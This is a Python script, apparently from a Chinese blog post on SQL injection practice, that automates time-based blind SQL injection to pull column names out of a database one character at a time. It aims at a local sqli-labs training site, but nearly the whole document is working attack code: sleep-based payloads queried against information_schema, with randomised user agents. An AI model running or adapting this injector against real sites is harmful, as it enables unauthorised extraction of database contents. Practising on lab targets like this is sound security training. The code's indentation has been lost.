# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 20:03
@Auth : zhangxiang
@File :BlindInject_StrColumn.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
from GetColumnLength_Str import GetColumnLength_Str
class BlindInject_StrColumn:
def __init__(self):
pass
def StartInject_StrColumn(self,url,code,resultList,TableName,numTable,DbName):
flag=0
#%20and%20if(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),1,1)=%27e%27,sleep(5),1)
for num in range(0, numTable+1):
url = url
judgeStr = "%20and%20if(substr((select%20group_concat(column_name)%20from%20information_schema.columns" \
"%20where%20table_name=%27TableName%27%20and%20table_schema=%27DbName%27),changeNum,1)=%27replaceStr%27,sleep(2),1)%23"
submitStr = "&submit=0x5375626D6974%23"
patternTableName = r"TableName"
replaceTableName = TableName
changeName1 = re.sub(patternTableName, replaceTableName, judgeStr)
patternDbName = r"DbName"
replaceDbName = DbName
changeName2 = re.sub(patternDbName, replaceDbName, changeName1)
pattern1 = r"changeNum"
replace1 = str(num)
FisWord = re.sub(pattern1, replace1, changeName2)
for x in code:
Str = x
word = FisWord + submitStr
# 正则
pattern2 = r"replaceStr"
replace2 = Str
SeWord = re.sub(pattern2, replace2, word)
full_url = url + SeWord
# print(full_url)
# 2.发请求保存到本地
headers = {'User-Agent':random.choice(ua_list)}
startTime = time.time()
req = request.Request(url=full_url, headers=headers)
res = request.urlopen(req)
endTime = time.time()
allTime = endTime - startTime
# print(allTime)
# print(flag)
if (resultList[flag] == "None"):
print("注入结束")
return resultList
if (allTime > 2):
print("*" * 200)
resultList.append(x)
print("得到盲注结果:" + str(resultList))
print("注入的payload:" + full_url)
print("使用的时间:" + str(allTime))
print("*" * 200)
flag = flag+1
else:
pass
return resultList
def getStr(self,resultList): # 将列表值转为字符串
resultList.pop(0)
list2 = [str(i) for i in resultList]
strList = ''.join(list2)
return strList
if __name__ == '__main__':
blindInject_StrColumn = BlindInject_StrColumn()
getColumnLength_Str = GetColumnLength_Str()
DbName="security"
TableName = "users"
resultList = ["开始"]
path = './code2.txt'
url = "http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-1/?id=1'"
f = open(path, 'r', encoding='utf-8')
code = f.read()
print(resultList[0])
print("注入中,请稍等:")
numTable = getColumnLength_Str.StartGetColumnLength_Str(url,TableName,DbName)
print("该表中的字段名长度为:" + str(numTable))
resultList = blindInject_StrColumn.StartInject_StrColumn(url,code,resultList,TableName,numTable,DbName)
strList = blindInject_StrColumn.getStr(resultList)
print("该表中的字段名有:"+strList)
SQL注入代码实践(盲注-获取字段名长度【字符型】)
最新推荐文章于 2024-04-13 12:40:18 发布